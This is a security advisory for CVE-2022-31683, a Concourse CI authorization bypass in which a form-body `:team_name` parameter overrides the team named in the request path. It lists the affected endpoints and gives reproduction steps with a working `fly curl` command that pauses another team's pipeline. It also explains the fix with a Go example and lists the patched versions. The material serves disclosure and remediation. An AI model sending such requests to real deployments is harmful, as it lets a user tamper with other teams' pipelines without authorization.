First published: Wed Oct 19 2022
### Impact

For some POST/PUT Concourse endpoints whose path contains `:team_name`, a Concourse user can send a request whose body includes `:team_name=team2` to bypass the team scope check and gain access to certain resources belonging to any other team. The user only needs a valid user session and membership in team2.

Exploitable endpoints:

```
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/builds/:build_name", Method: "POST", Name: RerunJobBuild},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/pause", Method: "PUT", Name: PauseJob},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/unpause", Method: "PUT", Name: UnpauseJob},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/schedule", Method: "PUT", Name: ScheduleJob},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/pause", Method: "PUT", Name: PausePipeline},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/unpause", Method: "PUT", Name: UnpausePipeline},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/expose", Method: "PUT", Name: ExposePipeline},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/hide", Method: "PUT", Name: HidePipeline},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/rename", Method: "PUT", Name: RenamePipeline},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/archive", Method: "PUT", Name: ArchivePipeline},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/versions/:resource_config_version_id/enable", Method: "PUT", Name: EnableResourceVersion},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/versions/:resource_config_version_id/disable", Method: "PUT", Name: DisableResourceVersion},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/versions/:resource_config_version_id/pin", Method: "PUT", Name: PinResourceVersion},
{Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/unpin", Method: "PUT", Name: UnpinResource},
{Path: "/api/v1/teams/:team_name/artifacts", Method: "POST", Name: CreateArtifact},
```

### Steps to reproduce

1. Set up a Concourse deployment with team 1 (with pipeline 1) and team 2. The user is in team 2 but not in team 1.
2. Log in as the user to team 2.
   ```
   fly -t ci login -n team2 -u user -p password
   ```
3. Try pausing pipeline 1 in team 1 using fly. Verify that the command output is `pipeline 'pipeline1' not found`.
   ```
   fly -t ci pause-pipeline -p pipeline1
   ```
4. Send a customized request through the `fly curl` command, intended to pause pipeline 1 again.
   ```
   fly -t ci curl /api/v1/teams/team1/pipelines/pipeline1/pause -- -X PUT -d ":team_name=team2" -H "Content-type: application/x-www-form-urlencoded"
   ```
5. Pipeline 1 in team 1 will be paused.

In step 4, the parameter pollution allows a user from any team to pause a pipeline that belongs to another team.

### Patches

Concourse [v6.7.9](https://github.com/concourse/concourse/releases/tag/v6.7.9) and [v7.8.3](https://github.com/concourse/concourse/releases/tag/v7.8.3) were both released with a fix on October 12, 2022. Instead of using [`FormValue`](https://pkg.go.dev/net/http#Request.FormValue) to parse `team_name` from the request, which allows body parameters to take precedence over URL query string values, both patched versions now use `URL.Query().Get()` across multiple scope handlers to prevent the parameter pollution.

### Workarounds

No known workarounds for existing versions.

### References

* https://github.com/concourse/concourse/pull/8566: PR with the fix

### For more information

If you have any questions or comments about this advisory, you may reach us privately at [security@concourse-ci.org](mailto:security@concourse-ci.org).
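The `FormValue` versus `URL.Query().Get()` difference described under Patches, shown as an added Go example that is not Concourse's own code. It assumes (as the fix's use of `URL.Query().Get()` implies) that the router has already copied the path's team into the URL query as `:team_name`; the request, the session and the `authorized` helper are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// vulnerableTeamName mirrors the pre-fix extraction: FormValue merges the URL
// query with the parsed body, and for PUT/POST/PATCH the body value wins.
func vulnerableTeamName(r *http.Request) string {
	return r.FormValue(":team_name")
}

// fixedTeamName mirrors the patched extraction: only the URL query is read,
// so a form body cannot override the team taken from the path.
func fixedTeamName(r *http.Request) string {
	return r.URL.Query().Get(":team_name")
}

// newPollutedRequest is a constructed request modelled on step 4 of the
// advisory. Assumption: the router has already copied the path parameter into
// the query as :team_name=team1; the form body then carries :team_name=team2.
func newPollutedRequest() *http.Request {
	q := url.Values{":team_name": {"team1"}, ":pipeline_name": {"pipeline1"}}
	target := "/api/v1/teams/team1/pipelines/pipeline1/pause?" + q.Encode()
	body := url.Values{":team_name": {"team2"}}.Encode()
	r := httptest.NewRequest(http.MethodPut, target, strings.NewReader(body))
	r.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	return r
}

// authorized is a minimal stand-in for the team scope check: the team the
// handler extracts must be one the caller's session belongs to.
func authorized(extract func(*http.Request) string, r *http.Request, sessionTeams map[string]bool) bool {
	return sessionTeams[extract(r)]
}

func main() {
	session := map[string]bool{"team2": true} // the caller belongs only to team2
	fmt.Println("FormValue       ->", vulnerableTeamName(newPollutedRequest()),
		"authorized:", authorized(vulnerableTeamName, newPollutedRequest(), session))
	fmt.Println("URL.Query().Get ->", fixedTeamName(newPollutedRequest()),
		"authorized:", authorized(fixedTeamName, newPollutedRequest(), session))
}
```

The vulnerable extraction reports `team2` and passes the scope check even though the path names `team1`; the patched extraction reports `team1` and the check fails, which is the behaviour the fix restores.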
Credit: security@vmware.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Pivotal Software Concourse | >=6.0.0, <6.7.9 | |
| Pivotal Software Concourse | >=7.0.0, <7.8.3 | |
| go/github.com/concourse/concourse | >=7.0.0, <7.8.3 | 7.8.3 |
| go/github.com/concourse/concourse | <6.7.9 | 6.7.9 |
CVE-2022-31683 is a vulnerability in Concourse versions 7.x.y prior to 7.8.3 and 6.x.y prior to 6.7.9 that allows an authorization bypass, allowing a user to gain access to certain resources belonging to other teams.
CVE-2022-31683 has a severity rating of 5.4, which is considered medium.
To fix CVE-2022-31683, you should upgrade to Concourse version 7.8.3 or 6.7.9, depending on your current version.
The affected software for CVE-2022-31683 is Concourse (Pivotal Software Concourse) versions 7.x.y prior to 7.8.3 and 6.x.y prior to 6.7.9.
You can find more information about CVE-2022-31683 in the GitHub security advisory: https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf